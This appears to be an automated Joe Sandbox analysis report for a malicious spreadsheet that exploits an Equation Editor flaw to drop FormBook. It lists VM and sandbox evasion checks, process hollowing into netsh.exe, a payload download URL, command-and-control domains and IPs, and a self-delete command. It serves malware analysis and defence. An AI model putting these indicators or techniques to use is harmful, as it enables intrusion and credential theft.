Source: Yara match	File source: 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3020, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 00000000001F85E4 second address: 00000000001F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 00000000001F896E second address: 00000000001F8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\Public\vbc.exe

Code function: 7_2_004088A0 rdtsc

7_2_004088A0

Source: C:\Users\Public\vbc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2336	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3008	Thread sleep time: -43005s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2952	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 2808	Thread sleep time: -32000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe	Last function: Thread delayed

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 43005			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000008.00000000.2185246191.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.2169813021.0000000004263000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 7_2_004088A0 rdtsc

7_2_004088A0

Source: C:\Users\Public\vbc.exe

Code function: 7_2_00409B10 LdrLoadDll,

7_2_00409B10

Source: C:\Users\Public\vbc.exe	Code function: 7_2_008D26F8 mov eax, dword ptr fs:[00000030h]		7_2_008D26F8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020526F8 mov eax, dword ptr fs:[00000030h]		9_2_020526F8

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.cleanxcare.com
Source: C:\Windows\explorer.exe	Domain query: www.ruhexuangou.com
Source: C:\Windows\explorer.exe	Network Connect: 163.44.239.73 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.iotcloud.technology
Source: C:\Windows\explorer.exe	Network Connect: 192.0.78.25 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.82.57.32 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.micheldrake.com
Source: C:\Windows\explorer.exe	Domain query: www.adultpeace.com
Source: C:\Windows\explorer.exe	Network Connect: 78.31.67.91 80	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1388			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Thread register set: target process: 1388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: C00000

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: explorer.exe, 00000008.00000000.2160929155.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000000.2160929155.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000000.2185246191.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000008.00000000.2160929155.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe

Queries volume information: C:\Users\Public\vbc.exe VolumeInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection612	Masquerading111	OS Credential Dumping	Security Software Discovery221	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Extra Window Memory Injection1	Disable or Modify Tools11	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection612	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol122	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	System Information Discovery113	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing2	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Extra Window Memory Injection1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
oustanding 03082921.xlsx	26%	ReversingLabs	Document-OLE.Exploit.CVE-2018-0802

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dun[1].exe	100%	Joe Sandbox ML
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
7.2.vbc.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
micheldrake.com	0%	Virustotal		Browse
adultpeace.com	7%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
www.adultpeace.com/p2io/	0%	URL Reputation	safe
http://www.iotcloud.technology/p2io/?dzuD7VXH=L/l9chWXgd4NYCGd+vVro19pFM6JqqsPd4ppl3EKhtG9qh305X+esnK5qs3e0XUjSiRqvg==&bzr8U=6lxL-0XX	0%	Avira URL Cloud	safe
http://www.ruhexuangou.com/p2io/?dzuD7VXH=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&bzr8U=6lxL-0XX	0%	Avira URL Cloud	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://wellformedweb.org/CommentAPI/	0%	URL Reputation	safe
http://www.cleanxcare.com/p2io/?dzuD7VXH=pxlxKDNxRow4YEfruB4Bv4ohCC0AYWvU81HhH938ZriMjSGbLHz+dxzd3d03S+kNJyuCfQ==&bzr8U=6lxL-0XX	0%	Avira URL Cloud	safe
http://13.229.216.142/www/dun.exe	0%	Avira URL Cloud	safe
http://www.micheldrake.com/p2io/?dzuD7VXH=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==&bzr8U=6lxL-0XX	0%	Avira URL Cloud	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.%s.com	0%	URL Reputation	safe
http://www.adultpeace.com/p2io/?dzuD7VXH=4oufm6g8t9Bugn+4kDBWoA8I6Q2bNaX51teMhl/6i5f1woTl8Y4OhcGguchYpq40FyXh9g==&bzr8U=6lxL-0XX	0%	Avira URL Cloud	safe
http://computername/printers/printername/.printer	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
micheldrake.com	192.0.78.25	true	true	0%, Virustotal, Browse	unknown
adultpeace.com	163.44.239.73	true	true	7%, Virustotal, Browse	unknown
iotcloud.technology	34.102.136.180	true	false		unknown
www.ruhexuangou.com	23.82.57.32	true	true		unknown
cleanxcare.com	78.31.67.91	true	true		unknown
www.trendbold.com	64.190.62.111	true	false		unknown
www.iotcloud.technology	unknown	unknown	true		unknown
www.cleanxcare.com	unknown	unknown	true		unknown
www.micheldrake.com	unknown	unknown	true		unknown
www.adultpeace.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.adultpeace.com/p2io/	true	URL Reputation: safe	low
http://www.iotcloud.technology/p2io/?dzuD7VXH=L/l9chWXgd4NYCGd+vVro19pFM6JqqsPd4ppl3EKhtG9qh305X+esnK5qs3e0XUjSiRqvg==&bzr8U=6lxL-0XX	false	Avira URL Cloud: safe	unknown
http://www.ruhexuangou.com/p2io/?dzuD7VXH=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&bzr8U=6lxL-0XX	true	Avira URL Cloud: safe	unknown
http://www.cleanxcare.com/p2io/?dzuD7VXH=pxlxKDNxRow4YEfruB4Bv4ohCC0AYWvU81HhH938ZriMjSGbLHz+dxzd3d03S+kNJyuCfQ==&bzr8U=6lxL-0XX	true	Avira URL Cloud: safe	unknown
http://13.229.216.142/www/dun.exe	true	Avira URL Cloud: safe	unknown
http://www.micheldrake.com/p2io/?dzuD7VXH=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==&bzr8U=6lxL-0XX	true	Avira URL Cloud: safe	unknown
http://www.adultpeace.com/p2io/?dzuD7VXH=4oufm6g8t9Bugn+4kDBWoA8I6Q2bNaX51teMhl/6i5f1woTl8Y4OhcGguchYpq40FyXh9g==&bzr8U=6lxL-0XX	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp	false		high
http://www.windows.com/pctv.	explorer.exe, 00000008.00000000.2167152019.0000000003C40000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	explorer.exe, 00000008.00000000.2161066027.0000000001C70000.00000002.00000001.sdmp	false		high
http://wellformedweb.org/CommentAPI/	explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 00000008.00000000.2178764759.000000000861C000.00000004.00000001.sdmp	false		high
http://www.iis.fhg.de/audioPA	explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.%s.com	explorer.exe, 00000008.00000000.2182647228.000000000A330000.00000008.00000001.sdmp	false	URL Reputation: safe	low
http://www.piriform.com/ccleaner	explorer.exe, 00000008.00000000.2166928921.00000000039F4000.00000004.00000001.sdmp	false		high
http://computername/printers/printername/.printer	explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.%s.comPA	explorer.exe, 00000008.00000000.2161066027.0000000001C70000.00000002.00000001.sdmp	false	URL Reputation: safe	low
http://%s.com	explorer.exe, 00000008.00000000.2182647228.000000000A330000.00000008.00000001.sdmp	false	URL Reputation: safe	low
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://treyresearch.net	explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 00000008.00000000.2182647228.000000000A330000.00000008.00000001.sdmp	false		high
http://servername/isapibackend.dll	explorer.exe, 00000008.00000000.2171247047.0000000004F30000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
192.0.78.25	micheldrake.com	United States	2635	AUTOMATTICUS	true
23.82.57.32	www.ruhexuangou.com	United States	7203	LEASEWEB-USA-SFO-12US	true
13.229.216.142	unknown	United States	16509	AMAZON-02US	true
34.102.136.180	iotcloud.technology	United States	15169	GOOGLEUS	false
163.44.239.73	adultpeace.com	Japan	7506	INTERQGMOInternetIncJP	true
78.31.67.91	cleanxcare.com	Germany	24961	MYLOC-ASIPBackboneofmyLocmanagedITAGDE	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	458692
Start date:	03.08.2021
Start time:	16:49:17
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	oustanding 03082921.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	2
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@9/19@6/6
EGA Information:	Failed
HDC Information:	Successful, ratio: 18% (good quality ratio 17.5%) Quality average: 76.9% Quality standard deviation: 24.9%
HCA Information:	Successful, ratio: 99% Number of executed functions: 131 Number of non-executed functions: 66
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, conhost.exe, svchost.exe Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:50:05	API Interceptor	83x Sleep call for process: EQNEDT32.EXE modified
16:50:09	API Interceptor	58x Sleep call for process: vbc.exe modified
16:50:33	API Interceptor	592x Sleep call for process: netsh.exe modified
16:51:20	API Interceptor	1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
192.0.78.25	New PO 0006770.exe	Get hash	malicious	Browse	www.shiveringcactus.net/cre4/?PtxdIRyH=7+hRd8m1vP97o5DubQyJa7OS+X2NiXrCwgnyTwU2qt1qd4obqhWDAvBuarWxQP6NRJIW&tVPL=8pttg
	ORDER -ASLF1SR00116-PDF.doc	Get hash	malicious	Browse	www.albamauto.net/b8eu/?ezr8A=70TsRgR2vUTwaBZBaIavO5cZmOIei0NEheN8ZSTfcNJaDqQ7hsLW55bL6mIsi1Qo/+DTOw==&9rXX=a0DtZFt
	nWVjpM9ao5s78s3.exe	Get hash	malicious	Browse	www.thefucktardmanual.com/weni/?w4td4X=paTIa7wk6wENei2ifBtyV89J84XPfxhm99Ukyv3bGQklY2IVNxmyjS3YzcO8hytrgcmp&-ZTL=DZVXL4MhaFsdF
	N#U00e9cessaire personnalis#U00e9.exe	Get hash	malicious	Browse	www.howecute.gifts/e7hf/?y6=f9iM9c+3fsP4RzZFYpl+3m3jTMcm1z0vQ5bFkmHpRCcswREfHpJ40b65D9ChYAA0vqVp&ixlp=4hJDHbfx9N0lF6fp
	sq9aBtcak6.exe	Get hash	malicious	Browse	www.melitalifestyle.com/bsk9/?r48tRDj0=54ZFvPxix3ktm0cof+J2zOdW7Drcn2iwvFiMnSZhOqqJdIgo1b2RYB3bBYI2w3lKQHLO&e6tp=r2Jx
	8944848MNBV.exe	Get hash	malicious	Browse	www.sheri-stewart-voice-over.com/ogia/?_8OtFv=8TV6FPYnvQiOBKXToCmDt2AOB2x0UyAIphRqfmjd0jCzeb+fSahEWUX5bXQxu5Pdxb2G&3fx=n48x_Zmp-
	PO=#PLL-Order - Order CP01JN02-07-21 - Xls.exe	Get hash	malicious	Browse	www.the-lost-company.com/cvrn/?q6A=dWH9krMwNTg04d9qCA2as0dJ3G0u4FDCkzoR2m1sSNPkmjVxvRUVijkaaUGHVOCA+Fn+&a0DX=8pstIRupspshhL
	9qFR0r9nR9.exe	Get hash	malicious	Browse	www.micheldrake.com/p2io/?c48dX8=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+ZZbge4LhevE&r6tLM=ktxh2
	Shipping Document DHL.exe	Get hash	malicious	Browse	www.bloodygoodbooks.com/0mq2/?z2J=P2JtLnr8&2d0LJl=ZDsTl6S9jIVij7pvgK4MoNWTWRqVGUkydkvX+MXwzdBUm4Dqeo1fEAUfiB+CDMsKfsHR
	SOA May-June 2021.exe	Get hash	malicious	Browse	www.soshecanned.com/u8u4/?q48l=cHWP6NwLv/aT6+rO/ebGv42NKIWnoFLhxJXNwGdVTw9RrQ1g4V3BIMmImBGJRa9G4IJL&hBZ=-ZcTFHRHlRdPjZE
	PO NEW ORDER 002001123.exe	Get hash	malicious	Browse	www.bloodygoodbooks.com/0mq2/?4h_hvt=ZDsTl6S9jIVij7pvgK4MoNWTWRqVGUkydkvX+MXwzdBUm4Dqeo1fEAUfiB+CDMsKfsHR&c4=IDKtp8tH
	heoN5wnP2d.exe	Get hash	malicious	Browse	www.micheldrake.com/p2io/?9rT0=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+ZZx/uILlcnE&l2M=0pZ4_
	New Order_PO 1164_HD-F 4020 6K.exe	Get hash	malicious	Browse	www.realisticallywritten.com/rnn4/?wTq8ft=GmGX+ZuUQKrJllFD61Nj3aDXZ2KnBcnPv870Qyh2TrQK74Ogs2MlXpAd7lGq2Q4qlDRf&-Zl8=9r6Tk4x8G
	June 21st,2021.exe	Get hash	malicious	Browse	www.montrosecbdsupplements.com/cb53/?2dsl=kWKLgmICLD6qL4jsOwiLv5cNl5cQawIygHjde5nt6Iv0ICD1QOnvzbH8xTqcBePo3D7i&p48=SBZ0
	Swift_Report.exe	Get hash	malicious	Browse	www.viviangee.net/m3rc/?m6W4u=Rplm9Zqm1bsTCiQ8zCYp9ODm03Tc7pnEYFm3lAJXwDtX36/iYM/09//KWT8Pit56oDfG&gJBPYB=4huxslfxL6VH_
	swift_copy.exe	Get hash	malicious	Browse	www.unapersonaestabien.com/m3rc/?oL3=o7izuhN0eiDBtRVTd1lDz6WKoPkNEuauPIN5CezYSPQXzsgO8JvVj8I3N35hvRYKS8My&i4YLl6=6lmTNHW8
	New Order Vung Ang TPP Viet Nam.exe	Get hash	malicious	Browse	www.mykiwidesign.com/un8c/?m6=shtUrfI/xlBO8C2aliNZenIpYotasWnDtIq4lctURnres2cu8VpZnDv2KEk7PBf6bd7Gagapdg==&z8b=iZspkzE0JnS86
	qXDtb88hht.exe	Get hash	malicious	Browse	www.micheldrake.com/p2io/?b0GDi6=Q6Ahtfox&Z8E=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+ZZx/uILlcnE
	Shipping Draft Doc.exe	Get hash	malicious	Browse	www.thelincmagazine.com/ajsp/?m2MXt=/vrJb/ib8JfDuP59hXmvirF0PbOJ5jAEPdt7hu8U8hUnFkZgeiMJfBrSsCKdAi+q3QiQ&g6bX=7nfxC0PhW
	Request for Courtesy Call - Urgent.xlsx	Get hash	malicious	Browse	www.micheldrake.com/p2io/?NFNpHvU=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==&Bv-=b8utZ

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LEASEWEB-USA-SFO-12US	New PO 0006770.exe	Get hash	malicious	Browse	23.81.39.143
	DHL Shipment Notification,PDF.exe	Get hash	malicious	Browse	172.255.209.118
	4A7rphFZrY	Get hash	malicious	Browse	142.91.25.66
	ORDER 200VPS.xlsx	Get hash	malicious	Browse	23.82.57.32
	heoN5wnP2d.exe	Get hash	malicious	Browse	23.82.57.32
	ZSu9Xi5VWW.exe	Get hash	malicious	Browse	23.82.57.32
	SKM_4050210326102400 jpg.exe	Get hash	malicious	Browse	23.108.182.213
	J1Dud83xTM.exe	Get hash	malicious	Browse	23.82.57.32
	DNPr7t0GMY.exe	Get hash	malicious	Browse	23.82.57.32
	lTAPQJikGw.exe	Get hash	malicious	Browse	147.255.162.204
